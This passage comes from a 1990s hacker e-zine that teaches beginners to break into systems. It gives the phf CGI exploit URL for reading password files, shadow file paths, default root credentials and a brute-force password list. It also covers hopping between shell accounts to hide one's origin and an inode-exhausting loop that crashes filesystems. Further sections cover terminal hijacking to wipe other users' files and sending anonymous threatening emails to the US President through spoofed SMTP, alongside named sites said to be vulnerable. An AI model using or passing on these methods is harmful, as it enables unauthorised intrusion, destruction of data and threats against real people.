  943. Ok now that you have the files to do so lets learn how to hack.  
  944. Before you can actually hack a system you need to know the type of system
  945. you are dealing with. The most common system you will run into is UNIX
  946. or a unix compatible server. There are many different types of UNIX. They 
  947. are CPIX,Berkeley Ver 4.1,Berkeley 4.2,FOS,Genix,HP-UX,
  948. IS/I,OSx,PC-IX,PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX,UTS,Unisys,
  949. Uniplus+, UNOS,Idris,QNIX,Coherent,Cromix,System III,System 7,Sixth edition,
  950. and most recently LINUX. But don't worry they use most of the same commands.
  951. You won't need to learn 100's of commands for each system! Some other systems
  952. there are but I won't get into much because you are just beginning are VAX,
  953. DEC,PRIME and there are many more.
  954.     Now you need to find a system to hack. If you know of any cheezy
  955. colleges around or even a big one that you would like to hack an account on
  956. they are the easiest to hack into for your first hack. This bug i am going
  957. to show is is called the phf bug it can still be used in some places. But
  958. no thanks to 2600 magazine the phf bug was let out to the public and many
  959. administrators have locked the bug out. Here is how it works:
  960. Find a computer you want to hack I.E  www.hackland.com
  961. Open your browser and type  
  962. www.hackland.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd
  963. If it says phf not found on system then you are out of luck but if you get
  964. Query Results then you might have a chance of getting the passwd file.
  965. If the passwd file came on your screen save it to a directory as passwd
  966. Then run a cracker program such as cracker jack , or the newly released
  967. john cracker on the passwd file. You can find a password crack on my site
  968. at www.elkhart.net/~sborosh/hacking/filez/filez/html
  969.  
  970. If you get query results and no file then their passwd file is under a different
  971. name. Here are the names of the passwd files on certain systems. Use the same
  972. command just  after cat%20 put the new directory and filename ie /etc/shadow
  973.  
  974.  
  975. UNIX System Type:               Path:                                           Token:
  976.  
  977. AIX 3                           /etc/security/passwd                       ! 
  978. or                              /tcb/auth/files/<first letter of           #    
  979.                 username>/<username>
  980.  
  981. A/UX 3.Os                       /tcb/files/auth/*
  982.  
  983. BSD4.3-Reno                     /etc/master.passwd                         *
  984.  
  985. ConvexOS 10                     /etc/shadpw                                        *
  986.  
  987. Convex0S 11                     /etc/shadow                                        *
  988.  
  989. DG/UX                           /etc/tcb/aa/user                                   *
  990.  
  991. EP/IX                           /etc/shadow                                        x
  992.  
  993. HP-UX                           /.secure/etc/passwd                        *
  994.  
  995. IRIX 5                  /etc/shadow                                        x
  996.  
  997. Linux 1.1                       /etc/shadow                                        *
  998.  
  999. OSF/1                           /etc/passwd[.dir|.pag]                     *
  1000.  
  1001. SCO UNIX #.2.x          /tcb/auth/files/<first letter of           *
  1002.                 username>/<username>
  1003.  
  1004. SunOS 4.1+c2            /etc/security/passwd.adjunct               ##
  1005.  
  1006. SunOS 5.0                       /etc/shadow                                        
  1007.  
  1008. System V 4.0            /etc/shadow                                        x
  1009.  
  1010. System V 4.2            /etc/security/* database                   
  1011.  
  1012. Ultrix 4                        /etc/auth[.dir|.pag]                       *
  1013.  
  1014. UNICOS                  /etc/udb                                           *
  1015.  
  1016.  
  1017.  
  1018. Now if the phf bug doesnt work i always ask around to see if anyone I know
  1019. has a shell account on that system i could use.  A shell account is a user
  1020. account that allows access to filez and programs. But if you dont know
  1021. anyone with a shell account on the system it is time to brute hack.
  1022. Brute hacking is just guessing the password until you get in. Yes this can
  1023. be boring so crank up your music and turn on the tv. If you have a shell 
  1024. account on another system log into as many accounts as you can before you 
  1025. log into the system you want to hack to hide where you are coming from.
  1026. So it would look something like this:
  1027.  
  1028. your isp ----telnet to-> shell #1 ------->shell#2------>the comp you want to hack.
  1029. If you have a shell and dont know what to type to telnet to another computer
  1030. all you have to type is telnet  then you will get the prompt 
  1031. telnet> type open and you will get the prompt  to> then type the address
  1032. of the site you want to hack.
  1033.  
  1034. If phf doesn't work you'll most likely have to resort to Brute Force Hacking.
  1035. To brute hack you must have a lot of pacience because it could take a 
  1036. long time.
  1037.  
  1038. Brute Force Hacking  Described by members of LOD
  1039. ~~~~~~~~~~~~~~~~~~~
  1040.    There will also be many occasions when the default passwords will not work
  1041. on an account.  At this point, you can either go onto the next system on your
  1042. list, or you can try to 'brute-force' your way in by trying a large database
  1043. of passwords on that one account.  Be careful, though!  This works fine on
  1044. systems that don't keep track of invalid logins, but on a system like a VMS,
  1045. someone is going to have a heart attack if they come back and see '600 Bad
  1046. Login Attempts Since Last Session' on their account.  There are also some
  1047. operating systems that disconnect after 'x' number of invalid login attempts
  1048. and refuse to allow any more attempts for one hour, or ten minutes, or some-
  1049. times until the next day.
  1050.    The following list is taken from my own password database plus the data-
  1051. base of passwords that was used in the Internet UNIX Worm that was running
  1052. around in November of 1988.  For a shorter group, try first names, computer
  1053. terms, and obvious things like 'secret', 'password', 'open', and the name
  1054. of the account.  Also try the name of the company that owns the computer
  1055. system (if known), the company initials, and things relating to the products
  1056. the company makes or deals with.
  1057.  
  1058.  
  1059. Anyway here are some common passwords to use when brute hacking:
  1060.  
  1061.  
  1062. These are super user accounts.
  1063. Login:                          Password:
  1064.  
  1065. root                                    root
  1066. root                                    system
  1067. sys                                     sys
  1068. sys                                     system
  1069. daemon                          daemon
  1070. uucp                                    uucp
  1071. tty                                     tty
  1072. test                                    test
  1073. unix                                    unix
  1074. unix                                    test
  1075. bin                                     bin
  1076. adm                                     adm
  1077. adm                                     admin
  1078. admin                                   adm
  1079. admin                                   admin
  1080. sysman                          sysman
  1081. sysman                          sys
  1082. sysman                          system
  1083. sysadmin                                sysadmin
  1084. sysadmin                                sys
  1085. sysadmin                                system
  1086. sysadmin                                admin
  1087. sysadmin                                adm
  1088. who                                     who
  1089. learn                                   learn
  1090. uuhost                          uuhost
  1091. guest                                   guest
  1092. host                                    host
  1093. nuucp                                   nuucp
  1094. rje                                     rje
  1095. games                                   games
  1096. games                                   player
  1097. sysop                                   sysop
  1098. root                                    sysop
  1099. demo                                    demo
  1100.  
  1101. Or if it is a users account guess these passwords:
  1102.  
  1103.     The password list was taken from A Novice's Guide To Hacking, by The Legion Of
  1104. Doom, and from some of my own discoveries. Here is the list of commonly used passwords:
  1105.  
  1106. Password:
  1107.  
  1108. aaa
  1109. academia
  1110. ada
  1111. adrian
  1112. aerobics
  1113. airplane
  1114. albany
  1115. albatross
  1116. albert
  1117. alex
  1118. alexander
  1119. algebra
  1120. alias
  1121. alisa
  1122. alpha
  1123. alphabet
  1124. ama
  1125. amy
  1126. analog
  1127. anchor
  1128. andy
  1129. andrea
  1130. animal
  1131. answer
  1132. anything
  1133. arrow
  1134. arthur
  1135. ass
  1136. asshole
  1137. athena
  1138. atmosphere
  1139. bacchus
  1140. badass
  1141. bailey
  1142. banana
  1143. bandit
  1144. banks
  1145. bass
  1146. batman
  1147. beautiful
  1148. beauty
  1149. beaver
  1150. daniel
  1151. danny
  1152. dave
  1153. deb
  1154. debbie
  1155. deborah
  1156. december
  1157. desire
  1158. desperate
  1159. develop
  1160. diet
  1161. digital
  1162. discovery
  1163. disney
  1164. dog
  1165. drought
  1166. duncan
  1167. easy
  1168. eatme
  1169. edges
  1170. edwin
  1171. egghead
  1172. eileen
  1173. einstein
  1174. elephant
  1175. elizabeth
  1176. ellen
  1177. emerald
  1178. engine
  1179. engineer
  1180. enterprise
  1181. enzyme
  1182. euclid
  1183. evelyn
  1184. extension
  1185. fairway
  1186. felicia
  1187. fender
  1188. finite
  1189. format
  1190. god
  1191. hello
  1192. idiot
  1193. jester
  1194. john
  1195. johnny
  1196. joseph
  1197. joshua
  1198. judith
  1199. juggle
  1200. julia
  1201. kathleen
  1202. kermit
  1203. kernel
  1204. knight
  1205. lambda
  1206. larry
  1207. lazarus
  1208. lee
  1209. leroy
  1210. lewis
  1211. light
  1212. lisa
  1213. louis
  1214. love
  1215. lynne
  1216. mac
  1217. macintosh
  1218. mack
  1219. maggot
  1220. magic
  1221. malcolm
  1222. mark
  1223. markus
  1224. martin
  1225. marty
  1226. marvin
  1227. matt
  1228. master
  1229. maurice
  1230. maximum
  1231. merlin
  1232. mets
  1233. michael
  1234. michelle
  1235. mike
  1236. minimum
  1237. nicki
  1238. nicole
  1239. rascal
  1240. really
  1241. rebecca
  1242. remote
  1243. rick
  1244. reagan
  1245. robot
  1246. robotics
  1247. rolex
  1248. ronald
  1249. rose
  1250. rosebud
  1251. rosemary
  1252. roses
  1253. ruben
  1254. rules
  1255. ruth
  1256. sal
  1257. saxon
  1258. scheme
  1259. scott
  1260. secret
  1261. sensor
  1262. serenity
  1263. sex
  1264. shark
  1265. sharon
  1266. shit
  1267. shiva
  1268. shuttle
  1269. simon
  1270. simple
  1271. singer
  1272. single
  1273. singing
  1274. smile
  1275. smooch
  1276. smother
  1277. snatch
  1278. snoopy
  1279. soap
  1280. socrates
  1281. spit
  1282. spring
  1283. subway
  1284. success
  1285. summer
  1286. super
  1287. support
  1288. surfer
  1289. suzanne
  1290. tangerine
  1291. tape
  1292. target
  1293. taylor
  1294. telephone
  1295. temptation
  1296. tiger
  1297. tigger
  1298. toggle
  1299. tomato
  1300. toyota
  1301. trivial
  1302. unhappy
  1303. unicorn
  1304. unknown
  1305. urchin
  1306. utility
  1307. vicki
  1308. virgin
  1309. virginia
  1310. warren
  1311. water
  1312. weenie
  1313. whatnot
  1314. whitney
  1315. will
  1316. william
  1317. winston
  1318. willie
  1319. wizard
  1320. wonbat
  1321. yosemite
  1322. zap
  1323.  
  1324.  
  1325.  
  1326. Once you have gotton in you need to get the passwd file. Type
  1327. etc/passwd
  1328. or
  1329. cat /etc/passwd
  1330. or 
  1331. ypcat passwd
  1332.  
  1333. Depending on what system you are in.
  1334.  
  1335. Once you get the passwd file this is what it looks like and means.
  1336.  
  1337. john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
  1338.  
  1339.     
  1340.     Broken down, this is what the above password file states:
  1341.  
  1342.  
  1343. Username: john
  1344. Encrypted Password: 234abc56
  1345. User Number: 9999
  1346. Group Number: 13
  1347. Other Information: John Johnson
  1348. Home Directory: /home/dir/john
  1349. Shell: /bin/john
  1350.  
  1351. But if you get a passwd file that is shadowed you will see      
  1352.  
  1353. john:*:9999:13:John Johnson:/home/dir/john:/bin/john
  1354.  
  1355. If you get this copying the passwd file wont help. The unshadowed passwd
  1356. file is usually /etc/shadow but you probably dont have permission to get it
  1357. unless you have a super user account.
  1358.  
  1359. If it is shadowed and you still want to pursue a superuser account try running
  1360. some source code which you can find at www.elkhart.net/~sborosh/hacking/filez/filez.html
  1361.  
  1362. ************************************************************************************************************
  1363.  
  1364.                 S  E  C  T  I  O  N      6
  1365.                            Navigating   Unix
  1366.  
  1367. In this section I am going to give you some useful commands for navigating and using unix.
  1368.  
  1369. First off  there is the    who   command which tells you who is on the system you are in.
  1370. Here is how to use the who command:
  1371.  
  1372.    who -b Displays time sys as last booted.
  1373.    who -H Precedes output with header.
  1374.    who -l Lists lines waiting for users to logon.
  1375.    who -q displays number of users logged on.
  1376.    who  -t displays time sys clock was last changed.
  1377.    who  -T displays the state field (a + indicates it is possible to send to terminal, a - means u cannot)
  1378.    who  -u Give a complete listing of those logged on.
  1379.  
  1380. who -HTu is the best choice 
  1381.  
  1382. talk <username> allows you to chat with another user
  1383. write <username> writes e-mail to that user.
  1384. ls      lists files in your current directory
  1385. du -a       Checks the amount of memory you have, or disk space
  1386. cd\name    (name is the name of the sub-directory you choose) 
  1387. cd\        (brings your home directory  to current use) 
  1388. help    brings up some commands you can use
  1389. man <command>  gives you all options on using that command
  1390.  This next command will create havok on a system
  1391.  
  1392. while : ; do
  1393.  
  1394.     mkdir x
  1395.  
  1396.     cd x
  1397.  
  1398. done
  1399.  
  1400.  
  1401. Either a panic will occur because all the i-nodes on the device are used up,
  1402.  
  1403. or all the disk blocks will be consumed, thus preventing anyone from writing
  1404.  
  1405. files on the device.I
  1406.  
  1407.  
  1408. -----------------------------------------------------------------------------
  1409. This next section was provided by CarbonBoy
  1410.  
  1411.    When a users state field (see -T flag option for who 
  1412. command) says that a user has their message function on, this 
  1413. actually means that it is possible to get stuff onto their 
  1414. screen.
  1415.      Basically, every terminal on the system has a file 
  1416. corresponding to it.  These files can be found in the /dev 
  1417. directory.  You can to anything to these files, so long as you 
  1418. have access -eg you can read them, and write to them, but you 
  1419. will notice that they never change in size.  They are called 
  1420. character specific files, and are really the link between the 
  1421. system and the terminals.  Whatever you put in these files will 
  1422. go staright to the terminal it corresponds to.
  1423.      Unfortunately, on most systems, when the user logs in, the 
  1424. "mesg n" command is issued which turns off write access to that 
  1425. terminal, BUT- if you can start cating to that terminal before 
  1426. system issues the mesg n command, then you will continue to be 
  1427. able to get stuff up on that terminal! This has many varied uses.
  1428.  
  1429.      Check out the terminal, or terminal software being used.  
  1430. Often you will be able to remotely program another users 
  1431. terminal, simply by 'cating' a string to a users screen.  You 
  1432. might be able to set up a buffer, capturing all that is typed, or 
  1433. you may be able to send the terminal into a frenzy- (sometimes a 
  1434. user will walk away without realizing that they are sill 
  1435. effectively logged on, leaving you with access to their 
  1436. account!).  Some terminal types also have this great command 
  1437. called transmit screen. It transmits everything on the screen, 
  1438. just as if the user had typed it !
  1439.      So just say I wanted to log off a user, then I would send a 
  1440. clear screen command (usually ctrl l), followed by "exit" 
  1441. followed by a carriage return, followed by the transmit screen 
  1442. code.  Using ths technique you can wipe peoples directories or 
  1443. anything.  My favourite is to set open access on all their files 
  1444. and directories so I can peruse them for deletion etc at my own 
  1445. leisure). 
  1446.  
  1447. End of Section by CarbonBoy
  1448. --------------------------------------------------------------------------
  1449.  
  1450.  
  1451.  
  1452. I hope this little file is some help to you beginners. Its always nice
  1453. to see new new handles on irc and to have people ask questions. 
  1454. Keep on hackin and don't get caught!!
  1455.  
  1456.  
  1457.   /////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\
  1458.   |                        By  DEFIANT                             |
  1459.   /////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\        
  1460.   
  1461.  
  1462. ~~~~Added By Defiant~~~~
  1463. ---------------------------------------------------------------------------
  1464. 
  1465. ---------------------------------------------------------------------------
  1466.  
  1467. Mesin with da president!:
  1468.  
  1469. ^^^^^^^NOTE FROM THA EDITOR^^^^^^^
  1470. This is a pretty touchy subject wich could get you caught fast... we do not
  1471. support or recomend using the contents of this file, nor any other files in
  1472. this zine... Please Keep That In Mind As You Read This Text.
  1473.  
  1474.  
  1475. "NEET TRICKS TO PLAY ON BILL CLINTON"
  1476.  
  1477. By: CooL_MoDe (That's mode, not moe "D" you fuckers)
  1478.  
  1479.  
  1480.      Ok Children.  All you anti-political assholes out there should really enjoy this one.
  1481.  
  1482.    How many of you have ever wondered, "Gee, wouldn't it be fun to do something to the President?"  
  1483. Well, now you can.  I am writting a 3 part article on different things you can do to old BC.  Each one has something to do with the H/P/V/A/C world.
  1484.  
  1485.  
  1486. Part 1:  E-Mail Threats!!!!!
  1487.  
  1488.  
  1489.    In this litle article I will teach you how to send threatning emails to the President, AND GET AWAY WITH IT!!!   In order to do this you MUST know something about sending anonymous email.  What you will need:
  1490. an anonymous email server
  1491. 3 shell accounts with any  telnetable UNIX system.
  1492. the presidents email
  1493.  
  1494. (All of these are provided)
  1495.  
  1496. Ok, now here we go. In order to save your ass from getting caught you MUST telnet to at least three other sites before telneting to the email server of your choice (prefferably one using an older version of sendmail).  So first of all, get out the old telnet client and telnet to where ever you have an account (make sure it is not your account, or you are gonna get busted).  Once you connect to the account login, and from there telnet out again to another different account:
  1497. ei: telnet myshell.whatever.org
  1498. From there do the same thing, telnet out again to the third, and final account.
  1499. Once in the third account you must connect to the email server you are going to use to send this mail from.  Below is a list(note some of these may have upgrade, and are no longer anonymous, but you should still be pretty safe as long as you telnet to those sites first):
  1500. www.zombie.com
  1501. mail.sgi.net
  1502. mail.westol.com
  1503. mail.vcalpha.com
  1504. (Note: when connecting to a mail server you MUST connect to port 25)
  1505.  
  1506.  
  1507. Ok, now, you are in the third account type:
  1508. telnet my.mail.server 25
  1509.  
  1510.  
  1511. You will see something like:
  1512.  
  1513. 220 bla.bla.bla ESMTP Sendmail 8.8.5/8.8.5; Thu, 27 Feb 1997 16:05:39 -05
  1514. 00 (EST)       
  1515.  
  1516. You must type
  1517. HELO me.com (or wherever ever you want the mail to be comming from)
  1518. MAIL FROM: wherever@me.com (or wherever you want the full email address of where you are sending from)
  1519. RCPT TO: President@whitehouse.com
  1520. DATA
  1521. What ever you wish to right
  1522. .  (Put the . on a line by it's self to stop the message)
  1523.  
  1524. Note: you can send multiple messages.  Simply by starting the process over again after the . with another MAIL FROM: command.  To quit send simply type quit.
  1525.  
  1526.  
  1527.  
  1528. PLACE TO GET UNIX SHELLS:
  1529.  
  1530. www.csmc.edu
  1531. www.dardan.com
  1532. www.fxmedi.com
  1533.  
  1534.  
  1535. All of the above sites have the phf exploit and the password file can be EASILY aquired.
  1536.  
  1537.  
  1538.  
  1539.  
  1540. DON'T GET CAUGHT!
  1541.  
  1542. C_M
  1543.  
  1544.  
  1545.  
  1546.  
  1547.  
  1548. ~~~~Added By Cool_Mode~~~~
  1549. ---------------------------------------------------------------------------
  1550. 
  1551. ---------------------------------------------------------------------------
  1552.  
  1553. Tips From Sygma:
  1554.  
  1555.  
  1556. Welcome to The First Issue of The Krack EZine.  I, Sygma, will be showing
  1557. you some cool trick and hacking.  I would also like to say (So I don't get
  1558. in Shit), that all the informatino presented on this page is for
  1559. educational perposes ONLY... but we all know thats not what your going to
  1560. be using it for.  Anyways I will be covering in every Issue, IRC
  1561. Scripting, Unix, and 95 (Yes 95.. Some Tricks and shit for dummies, cause
  1562. some people need it, no Names to be said).  If you need back issues and so
  1563. on, check www.on-it.net/~sygma/Krack (Which is not up yet cause I need to
  1564. make it :))  In all issues there is going to be a little area about stuff
  1565. that I write on, my views and so on.
  1566.     First, my views :).  I was reading TIME (Feb 3rd, 1997) and got to
  1567. page 53 or so.  The article is called INFO PIPLINES.  I was looking at the
  1568. double page map and looked at the legend.  Now would somone explain to me
  1569. why we run Coaxial Cables to South America, and some 2.5 Gigabits a sec
  1570. lines (Coaxial what were they thinking?).  On the Right hand side I was 
  1571. reading that in Europe/Asia a "SEA-ME-WE 3, operational around 1999, 
  1572. initially 10 gigabits per sec.  Hint: Look at the word SEA then you'll
  1573. find out where it runs.  Here is a Quote from TIME:
  1574.     "I'll put a girdle 'round about the earth in 40 minutes,"
  1575. declared Puck in A Midsummer Night Dream.  Four hundred years after the
  1576. play was first produced, the globe is being girdled more thoroughly then
  1577. Shakespeare ever dreamed.  The transocceanic copper wires that made
  1578. communications possible in the presatellite era are being replaced by
  1579. arrays of sophisticated fibre optic capable of carrying huge amounts of
  1580. data more reliably then the electronic birds circling in the upper
  1581. atmosphere.  These new data links are the oil piplines of the information
  1582. age, the prime conduits for the tech-nological revolution.  Where and how
  1583. they are built points the way to future change.
  1584.     The FLAG (FibreOptic Link Around the Globe) project, a $1.5
  1585. Billion, 28 000 KM underwater cable snaking its way across the ocean floor
  1586. from Britain to Japan, is nearly complete.  When finished, it will offer
  1587. uninterrupted data traffic between Europe and Asia, traffic that currently
  1588. must be routed through the U.S.  It is akin to openeing a new navigational
  1589. route that will link 75% of the World's Population.  It's 5 gigabits of
  1590. information per second will allow for a huge increase in electronic
  1591. traffic.
  1592.     Another megaproject that will alter informational trade routes is
  1593. the $1.73 Billion SEA-ME-WE 3 cable, approved in January by the 70
  1594. countries invloved in its construction.  Strtching 38 000 KM, it will by
  1595. 1999 connect SouthEast Asia, Weestern Europe...."
  1596.     This Article goes on for quite awhile, but this is the part that
  1597. interests me.  We get all this lag on irc and all, since not all the
  1598. servers run the same line.  Dallas for instance is the fastest irc server,
  1599. connection wise.  Followed by Washington and Vancouver if I can remember
  1600. well.  Only if all the servers would be running the same speed connection
  1601. we would not have as many problems.  Think About it.
  1602.  
  1603.     Now onto the Irc Scripting section.  I'm going to start this off
  1604. REALLY easy.  Like this is so easy you would think that a newborn kid
  1605. could do it.
  1606.     -= Alias =-  I have added some Easy to Use aliases.
  1607. /i+ /mode # +i
  1608. /i- /mode # -i
  1609. /n+ /mode # +n
  1610. /n- /mode # -n
  1611. /m+ /mode # +m
  1612. /m- /mode # -m
  1613. /t+ /mode # +t
  1614. /t- /mode # -t
  1615. /s- /mode # -s
  1616. /s+ /mode # +s
  1617. /p+ /mode # +p
  1618. /p- /mode # -p
  1619. /k+ /mode # +k $$1
  1620. /k- /mode # -k $$1
  1621. /v+ /mode # +v $$*
  1622. /v- /mode # -v $$*
  1623. /l+ /mode # +l $$1
  1624. /l- /mode # -l
  1625.  
  1626.     -= Events =- I will be using a 10 level system.
  1627.     10. Protect, Ops, and so on... the rest of the levels I'll think
  1628. of.. 1 is shitlist tho :)  8 will be just ops.
  1629.  
  1630.     10:ON JOIN:#:/mode $chan +o $nick
  1631.      8:ON JOIN:#:/mode $chan +o $nick
  1632.  
  1633.     ok now see how easy I started? (I'm actually crying now, this is
  1634. sooooooo funny) anyways.
  1635.  
  1636.     -= Popups =-
  1637.     under Nicknames List add this
  1638. User Levels:
  1639. .Friend
  1640. ..Add:/guser 8 $* 3
  1641. ..Remove:/ruser 1 $* 
  1642. .Friend (level 10)
  1643. ..Add:/guser 10 $* 3 
  1644. ..Remove:/ruser 1 $*
  1645. .Add User:/auser =6 $*
  1646.     
  1647.  
  1648.  
  1649.     Ok enough of that Section.. hehehe  Ok now for the Unix Section.
  1650. This is going to start off from beginner to expert.  We get those people
  1651. joining #Hackteach asking for help and some how end up getting banned.
  1652. AHEM I won't mention nicks.  This first one will be basic unix commands
  1653. and stuff.  Why?  Because I'm running out of time to do more.  Was on a
  1654. ski trip last week.
  1655.     -=PLEASE NOTE, what I put in CAPS MUST BE in Caps, case sensitive =-
  1656.  
  1657.     ls - This is the Unix command for 'dir'
  1658.     mv - move
  1659.     cp - copy
  1660.     mkdir - make a directory
  1661.     ps - check processes
  1662.     w - show users
  1663.     finger - uhhh.. better let urself figure this out.
  1664.  
  1665.     Ok I'm like outta time..cause ti's about 9:
  1666.  pm right now.. and I need to finish 3 essays for tomorrow.. if u have any
  1667. questions or comments, please Email me: Sygma@Pegasus.on-it.net.  Also I
  1668. don't want to get some bullshit mail.
  1669.  
  1670.  
  1671.  
  1672. ~~~~Added By Sygma~~~~
  1673. ---------------------------------------------------------------------------
  1674. 
  1675. ---------------------------------------------------------------------------
  1676.  
  1677. List of members:
  1678.  
  1679. Members with a > next to their name donated to this issue... All other 
  1680. members who dont have that are either on probation... or have a special
  1681. arrangement with me.
  1682.  
  1683. >DocKool       Leader/Programmer/             DocKool@hotmail.com
  1684. >NeTDeViL      Leader/HTML Editor/Phreak      NeTD@hotmail.com
  1685. KaMeLeoN       Leader/Founder/Grafix Expert   Liongrafx@hotmail.com            
  1686.                          
  1687. >Sygma          Writer/Scripter                Sygma@pegasus.on-it.net
  1688. >BlueRain      Writer/Programmer              pmurgs@aztec.co.za
  1689. KidLinux       Writer/Programmer              infs00ca@frank.mtsu.edu
  1690. OoPTiCoO       Writer/                        ay921@rfgn.epcc.edu
  1691. Cyb3rCh|k      Writer/                        cyb3rchik@worldnet.att.com
  1692. DeathLike      Writer/                        Deathlike@hotmail.com
  1693. >Defiant       Writer/                        Sborosh@skyenet.net
  1694. >Dislexic      Writer/WebDesign/Security      jhanna29@ally.ios.com 
  1695. >Od^Phreak     Writer/Unix Haxor              butler@tir.com
  1696. Zophar         Writer/Phreak                  zophar@ix.netcom.com
  1697. >Cool_Mode     Writer/Unix Hacker             coolmode@sgi.net
  1698.  
  1699. ---------------------------------------------------------------------------
  1700. 
  1701. ---------------------------------------------------------------------------
  1702. Closing notes:
  1703.  
  1704. Wassup Wassup Wassup, This is NetDevil your Zine Editor. I been away awhile
  1705. but were back, and Doc, Kame, and I are bringing Krack back strong. But we 
  1706. need yer help... if you have anything we can use, from the newest bugs in
  1707. popular software to well... anything we can use... please email it to me. A
  1708. special thanx go out to all the members... especially those who donated...
  1709. it was through your hard work and efforts that the rising of Krack was able
  1710. to put this out... thanx again to everyone.
  1711.                     NeTDeViL
  1712.                        
  1713. P.S. I threw in some helpful links below... chek em out.
  1714.  
  1715. www.microsoft.com --- Microsofts home page... includes dnloadable soft.
  1716. www.netscape.com --- Netscapes home page... does this software work???
  1717.  
  1718. www.yahoo.com --- search engine
  1719. www.lycos.com --- search engine
  1720. www.webcrawler.com --- search engine
  1721. www.altavista.com --- search engine
  1722.  
  1723. www.hotmail.com --- free web based email 
  1724. www.netmanage.co.jp/news/jetmail.htm --- free web based email
  1725.  
  1726. www.geocities.com --- free web space for web pages
  1727. www.angelfire.com --- free web space for web pages
  1728.  
  1729. www.mirc.co.uk --- mIRCs downloadble software
  1730.  
  1731. www.tucows.com --- free utilities
  1732.  
  1733. ---------------------------------------------------------------------------
  1734. 
  1735. ---------------------------------------------------------------------------
  1736. This Has Been a K.R.A.C.K. production. Thank you for Choosing K.R.A.C.K
  1737.             Killer Ride And Chillin Kraftwork
  1738.                        
  1739.                        Also With 
  1740.             
  1741.                       
  1742.             10010011 1000110 10010001 10101001 10101001
  1743.               CyBrids CSE The Taste of a new Genre ;)
  1744.                   10101001 1010101 11010010 10101010 10101010
  1745.  
  1746.  
  1747. Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz!